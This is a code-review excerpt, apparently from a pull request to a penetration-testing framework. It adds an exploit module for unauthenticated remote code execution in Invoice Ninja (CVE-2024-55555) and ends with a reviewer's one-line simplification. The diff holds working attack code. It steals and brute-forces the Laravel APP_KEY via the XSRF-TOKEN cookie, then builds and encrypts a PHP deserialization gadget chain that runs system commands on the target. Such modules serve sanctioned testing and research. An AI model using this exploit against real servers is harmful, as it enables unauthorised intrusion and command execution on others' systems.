modules/exploits/linux/http/invoiceninja_unauth_rce_cve_2024_55555.rb

```diff
@@ -0,0 +1,169 @@
+    # option APP_KEY is either a single entry of a file with APP_KEYS using the [file:] identifier
+    cipher_mode = 'AES-256-CBC'
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path, 'login')
+    })
+    fail_with(Failure::Unknown, 'No valid response received from target.') unless res&.code == 200
+
+    print_status('Lets check if the APP_KEY(s) is/are valid by decrypting the XSRF_TOKEN inside the cookie.')
+    print_status('Grabbing the cookie with the XSRF-TOKEN.')
+    set_cookie = res.get_cookies
+    fail_with(Failure::NotFound, 'No cookie found.') if set_cookie.nil?
+    xsrf_token = set_cookie.match(/XSRF-TOKEN=([^;]+)/)
+    if xsrf_token.nil?
+      fail_with(Failure::NotFound, 'No XSRF-TOKEN found. Unable to check APP_KEY.')
+    elsif datastore['BRUTEFORCE']
+      key_file = datastore['BRUTEFORCE']
+      print_status("Starting bruteforce decryption with APP_KEYS listed in #{key_file}.")
+      result = laravel_bruteforce_from_file(xsrf_token[1], key_file, cipher_mode)
+      if result.nil?
+        fail_with(Failure::NotFound, "Bruteforce decryption failed. No valid APP_KEY found in file #{key_file}.")
+      else
+        print_good("Valid APP_KEY found: #{result['key']}")
+        print_good("Unciphered value: #{result['value']}")
+        valid_app_key = result['key']
+      end
+    else
+      result = laravel_decrypt(xsrf_token[1], datastore['APP_KEY'], cipher_mode)
+      if result.nil?
+        fail_with(Failure::BadConfig, "Decryption with APP_KEY: #{datastore['APP_KEY']} failed.")
+      else
+        print_good("APP_KEY is valid: #{datastore['APP_KEY']}")
+        print_good("Unciphered value: #{result}")
+        valid_app_key = datastore['APP_KEY']
+      end
+    end
+
+    print_status('Generate an encrypted serialization payload with our cracked APP_KEY.')
+    pl = payload.encoded
+    pl = "php -r \"#{payload.encoded.gsub('"', '\"').gsub('$', '\$')}\"" if target['Type'] == :php
+    pl_len = pl.length
+    laravel_payload = "a:2:{i:7;O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"\x00*\x00events\";O:35:\"Illuminate\\Database\\DatabaseManager\":2:{s:6:\"\x00*\x00app\";a:1:{s:6:\"config\";a:2:{s:16:\"database.default\";s:6:\"system\";s:20:\"database.connections\";a:1:{s:6:\"system\";a:1:{i:0;s:#{pl_len}:\"#{pl}\";}}}}s:13:\"\x00*\x00extensions\";a:1:{s:6:\"system\";s:12:\"array_filter\";}}}i:7;i:7;}"
+    b64_laravel_payload = Base64.strict_encode64(laravel_payload)
+    laravel_cipher = laravel_encrypt(b64_laravel_payload, valid_app_key, cipher_mode)
+    fail_with(Failure::BadConfig, 'Laravel encryption failed.') if laravel_cipher.nil?
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :php, :unix_cmd
+      execute_command(laravel_cipher)
+    end
```

Comment:
```suggestion
    execute_command(laravel_cipher)
```

this should be enough I think